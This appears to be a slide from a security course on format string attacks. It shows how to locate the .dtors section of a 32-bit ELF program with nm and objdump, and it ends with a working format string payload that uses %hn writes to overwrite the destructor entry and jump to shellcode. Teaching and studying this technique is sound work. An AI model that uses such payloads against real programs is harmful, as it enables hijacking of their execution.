Computing .dtors Location
•Address
location for our jump to shellcode should be 4
bytes past the DTOR_LIST
•Target
address using example above is 0x080495bc
$ nm ./fmtstr |
grep DTOR
080495bc d
__DTOR_END__
080495b8 d
__DTOR_LIST__
$ objdump -s -j
.dtors ./fmtstr
./fmtstr: file format
elf32-i386
Contents of
section .dtors:
80495b8 ffffffff 00000000
........
$
./fmtstr `printf
“\xbe\x95\x04\x08\xbc\x95\x04\x08”`%.49143x$4\$hn%.16086x%5\$hn